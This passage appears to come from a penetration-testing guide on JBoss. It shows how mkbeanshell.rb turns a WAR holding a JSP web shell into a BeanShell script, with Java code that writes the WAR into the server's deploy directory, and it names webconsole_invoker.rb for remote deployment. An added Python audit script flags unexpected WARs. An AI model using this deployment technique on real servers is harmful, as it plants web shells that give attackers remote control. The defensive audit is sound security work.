One of the scripts in the archive is mkbeanshell. This script takes a WAR file as input and then creates a BSH script as output:
- We can see a list of all options available to us by executing the script with the -h flag, as shown:
- Now, we can create a BSH using the following command:
./mkbeanshell.rb -w <war file> -o <the output file>
The output of the command (that is, the BSH script) is saved in the output file specified in the preceding command. In this case, the file created is redteam.bsh, as we can see in the following screenshot:
- The source file (that is, the WAR file used, in this case) is the generic payload file. Inside this WAR file is our JSP web shell, whose content can be seen in the following screenshot:
- By default, if we open the BSH script that was created, we will see that it uses the /tmp/ directory on the server to extract and deploy the WAR archive. Windows servers do not have a /tmp/ directory, and although the mkbeanshell Ruby script has an option to change the path, in most cases we do not know a writable path on the server at all. The following screenshot shows the BSH script's code:
- We can replace the last lines of code (in the previous screenshot) with the following lines of code to get the generic file locations:
BASE64Decoder decoder = new BASE64Decoder();
// Resolve the JBoss server home from the JVM; this works on Windows and *nix alike
String jboss_home = System.getProperty("jboss.server.home.dir");
// Create the deploy directory under the server home
new File(jboss_home + "/deploy/").mkdir();
// val holds the Base64-encoded WAR, as defined earlier in the generated BSH script
byte[] byteval = decoder.decodeBuffer(val);
String location = jboss_home + "/deploy/test.war";
FileOutputStream fstream = new FileOutputStream(location);
fstream.write(byteval);
fstream.close();
- Here, we can see that System.getProperty("jboss.server.home.dir") fetches the JBoss server home directory. This is platform-independent code that works on Windows as well as *nix-based servers. All we need to do is create a new directory named deploy under that home directory using new File(jboss_home + "/deploy/").mkdir(); then the Base64-encoded WAR is decoded and written into the deploy directory as test.war. The following screenshot shows the BSH script's final code after these changes have been made:
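Because the script above drops its archive straight into the server's own deploy directory, the defender-side counterpart is an audit of that directory for WAR files that were not deployed through the normal release process and that carry JSP entries. The following Python script is an added example written for this page; it is not part of redteam-jboss or of JBoss itself. It takes the server home path as an argument (the same value the JVM exposes as jboss.server.home.dir) and compares the WARs found under deploy/ against an allowlist of expected archives. The sample directory it builds, including the crm.war and test.war archives and the cmd.jsp entry, is constructed fixture data.

```python
import os
import tempfile
import zipfile

# Entry names inside a WAR that indicate server-side code rather than static content
JSP_SUFFIXES = (".jsp", ".jspx")


def jsp_entries(war_path):
    """Return the JSP/JSPX entry names inside a WAR archive (empty list if none)."""
    with zipfile.ZipFile(war_path) as zf:
        return sorted(n for n in zf.namelist() if n.lower().endswith(JSP_SUFFIXES))


def audit_deploy_dir(jboss_home, allowlist):
    """Report WAR files under <jboss_home>/deploy that are not on the allowlist.

    Each finding records the archive name, its size, and any JSP entries it
    contains; an unexpected WAR that ships JSP code is rated 'high', one
    without JSP code 'medium'.
    """
    deploy = os.path.join(jboss_home, "deploy")
    findings = []
    for name in sorted(os.listdir(deploy)):
        if not name.lower().endswith(".war"):
            continue
        if name in allowlist:
            continue
        path = os.path.join(deploy, name)
        jsps = jsp_entries(path)
        findings.append({
            "archive": name,
            "size": os.path.getsize(path),
            "jsp_entries": jsps,
            "severity": "high" if jsps else "medium",
        })
    return findings


def build_sample_home():
    """Construct a throwaway server home with one expected and one unexpected WAR.

    This is fixture data for the example, not a real JBoss installation.
    """
    home = tempfile.mkdtemp(prefix="jboss_home_")
    deploy = os.path.join(home, "deploy")
    os.makedirs(deploy)
    # Expected application: static content plus a descriptor, no JSP code
    with zipfile.ZipFile(os.path.join(deploy, "crm.war"), "w") as zf:
        zf.writestr("index.html", "<html><body>ok</body></html>")
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
    # Unexpected archive mimicking the test.war written by the BSH script above;
    # the JSP body is a placeholder comment, not executable code
    with zipfile.ZipFile(os.path.join(deploy, "test.war"), "w") as zf:
        zf.writestr("cmd.jsp", "<%-- placeholder entry for the audit example --%>")
    return home


if __name__ == "__main__":
    home = build_sample_home()
    for f in audit_deploy_dir(home, allowlist={"crm.war"}):
        print(f"{f['severity']:6} {f['archive']:12} {f['size']:6} bytes  jsp={f['jsp_entries']}")
```

Run against a live server by passing its real home directory and the list of archives your deployment pipeline is expected to have placed there; anything else in deploy/, especially a WAR whose only content is a JSP, warrants an incident ticket. The same check can be scheduled alongside file-integrity monitoring of the deploy directory so that a newly written WAR is caught at deploy time rather than at the next audit.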
Once the BSH script is ready, we can use the webconsole_invoker.rb script, which comes with the same third-party tool, redteam-jboss.tar.gz, to deploy our BSH script remotely onto the JBoss AS instance.